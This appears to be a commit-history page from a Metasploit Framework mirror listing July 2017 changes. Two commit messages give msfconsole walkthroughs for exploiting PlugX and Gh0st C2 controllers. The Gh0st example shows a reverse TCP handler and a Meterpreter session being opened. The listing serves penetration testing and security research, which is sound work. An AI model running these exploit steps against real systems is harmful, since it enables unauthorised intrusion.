adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
43,128 Commits 27 Branches 1,043 Tags
5c8a90a7be21da950fb2e5ea19e17d0a71c81c67
Commit Graph

22478 Commits

Author SHA1 Message Date
Professor-plum 99546330f1 Added PlugX Controller Stack Overflow Module 
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.

## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.

- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target

Sample output:
```
msf> use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check

[*] 192.168.161.128:13579 - "\x03\xB0\x02\x00\x04\x00"
[*] 192.168.161.128:13579 The target appears to be vulnerable.
msf exploit(plugx) >
 2017-07-29 10:36:42 -06:00
Professor-plum c336daec8d Added Gh0st Controller Buffer Overflow Module 
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution 

## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.

- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit

Sample output:
```
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost 192.168.161.128
rhost => 192.168.161.128
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 192.168.161.1:4444 
[*] 192.168.161.128:80 - Trying target Gh0st Beta 3.6
[*] 192.168.161.128:80 - Spraying heap...
[*] 192.168.161.128:80 - Trying command 103...
[*] Sending stage (957487 bytes) to 192.168.161.128
[*] Meterpreter session 1 opened (192.168.161.1:4444 -> 192.168.161.128:49161) at 2017-07-29 10:11:4
 2017-07-29 10:21:05 -06:00
wchen-r7 c5021bf665 Land #8761, Add CVE-2017-7442: Nitro Pro PDF Reader JS API Code X 2017-07-28 17:02:59 -05:00
Brent Cook 354869205a make exploit/multi/handler passive 
This gives exploit/multi/handler a makeover, updating to use more-or-less
standard Ruby, and removing any mystical hacks at the same time (like select
instead of sleep).

This also gives it a Passive stance, and sets ExitOnSession to be false by
default, which is the setting that people use 99% of the time anyway.
 2017-07-24 15:47:06 -07:00
mr_me bf4dce19fb I added the SSD advisory 2017-07-24 14:25:10 -07:00
mr_me b099196172 deregistered SSL, added the HTA dodgy try/catch feature 2017-07-24 10:28:03 -07:00
mr_me 17b28388e9 Added the advisory, opps 2017-07-24 10:09:21 -07:00
mr_me 14ca2ed325 Added a icon loading trick by Brendan 2017-07-24 10:06:20 -07:00
mr_me b2a002adc0 Brendan is an evil genius\! 2017-07-24 09:58:23 -07:00
mr_me cc8dc002e9 Added CVE-2017-7442 2017-07-24 08:21:59 -07:00
Brent Cook 6300758c46 use https for metaploit.com links 2017-07-24 06:26:21 -07:00
Brent Cook 80d18fae6a update example modules to have zero violations 2017-07-24 06:15:54 -07:00
Brent Cook 1d290d2491 resurrect one print_error/bad conversion for symmetry 2017-07-24 05:55:34 -07:00
Brent Cook 8db3f74b81 fix a broken link 2017-07-24 05:53:09 -07:00
Brent Cook 838b066abe Merge branch 'master' into land-8716 2017-07-24 05:51:44 -07:00
Brent Cook 8444038c62 Add eval alternative to PHP Meterpreter to bypass suhosin 
See https://suhosin.org/stories/index.html for more information on this system.
 2017-07-23 22:04:09 -07:00
Pearce Barry fb905c4bc7 Land #8754, fix some module documentation 2017-07-23 11:44:07 -05:00
Pearce Barry a140209c36 Land #8739, cleanup windows_autologin 2017-07-23 11:35:34 -05:00
Brent Cook 7c55cdc1c8 fix some module documentation 
3 modules got documentation landed in the wrong spot. This also fixes a few
typos and improves formatting.
 2017-07-23 07:46:52 -07:00
Brent Cook df22e098ed Land #8695, Fix #8675, Add Cache-Control header, also meta tag for BAP2 2017-07-23 07:17:45 -07:00
Brent Cook 8c8dbc6d38 Land #8692, Fix #8685, Check nil condition for #wordlist_file in jtr modules 2017-07-23 07:12:21 -07:00
Brent Cook 2c3712479d Land #8750, openssl_heartbleed fix, use ruby 2.4 OpenSSL::PKey::RSA API 2017-07-23 06:58:40 -07:00
Brent Cook b75530b978 Fix an issue where 'sleep' with Python Meterpreter appears to fail. 2017-07-23 05:38:06 -07:00
Brent Cook 399557124f update payload cached sizes 2017-07-23 05:28:32 -07:00
Christian Mehlmauer b4bb384577 add @pbarry-r7 's feedback 2017-07-22 18:54:36 +02:00
g0tmi1k e710701416 Made msftidy.rb happy 
...untested with the set-cookie 'fix'
 2017-07-21 19:55:26 -07:00
Pearce Barry 6bb745744b Land #8471, Add VICIdial user_authorization Unauthenticated Command Execution module 2017-07-21 15:57:08 -05:00
Evgeny Naumov 5d04775f5e use 2.4 OpenSSL::PKey::RSA api 2017-07-21 16:28:07 -04:00
g0tmi1k 524373bb48 OCD - Removed un-needed full stop 2017-07-21 07:41:51 -07:00
g0tmi1k 772bec23a1 Fix various typos 2017-07-21 07:40:08 -07:00
Brent Cook 510ff888fd Land #8439, native OSX meterpreter support 2017-07-20 22:01:49 -05:00
bwatters-r7 ffad0d1bbf Land #8559, Ipfire oinkcode exec 2017-07-19 14:31:18 -05:00
bwatters-r7 116a838cb0 Version check update and stylistic fix 2017-07-19 13:26:40 -05:00
g0tmi1k 3f6925196b OCD - store_loot & print_good 2017-07-19 13:02:49 +01:00
g0tmi1k ef826b3f2c OCD - print_good & print_error 2017-07-19 12:48:52 +01:00
g0tmi1k 0f453c602e Even more print_status -> print_good 2017-07-19 11:46:39 +01:00
g0tmi1k df9b642746 More print_status -> print_good 2017-07-19 11:39:15 +01:00
g0tmi1k b8d80d87f1 Remove last newline after class - Make @wvu-r7 happy 2017-07-19 11:19:49 +01:00
g0tmi1k 3d4feffc62 OCD - Spaces & headings 2017-07-19 11:04:15 +01:00
g0tmi1k a008f8e795 BruteForce - > Brute Force 2017-07-19 10:39:58 +01:00
Christian Mehlmauer 0d3f5ae220 cleanup windows_autologin 2017-07-18 22:50:34 +02:00
Jon Hart 45f81f3c98 Squash some style issues 2017-07-18 12:45:02 -07:00
Brent Cook cc3168933f update mettle payloads, template generator 2017-07-18 13:13:38 -05:00
Brent Cook f5e76092d6 Merge branch 'master' into land-8439- 2017-07-18 08:25:18 -05:00
bwatters-r7 ba92d42b57 Updated version check per @bcoles 2017-07-17 15:52:50 -05:00
Jon Hart e93e524c3b Merge branch 'upstream-master' into feature/rdp-scanner 2017-07-17 13:46:59 -07:00
Jon Hart 43e04c8894 Improve RDP probe packet 2017-07-17 13:14:47 -07:00
David Maloney 2a1c661c79 Land #8723, Razr Synapse local exploit 
lands ZeroSteiner's Razr Synapse local priv esc module
 2017-07-17 13:34:17 -05:00
Spencer McIntyre b4813ce2c7 Update the pre-exploit check conditions 2017-07-15 14:48:54 -04:00
Pearce Barry 9775df1f6e Land #8586, Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit 2017-07-14 15:20:01 -05:00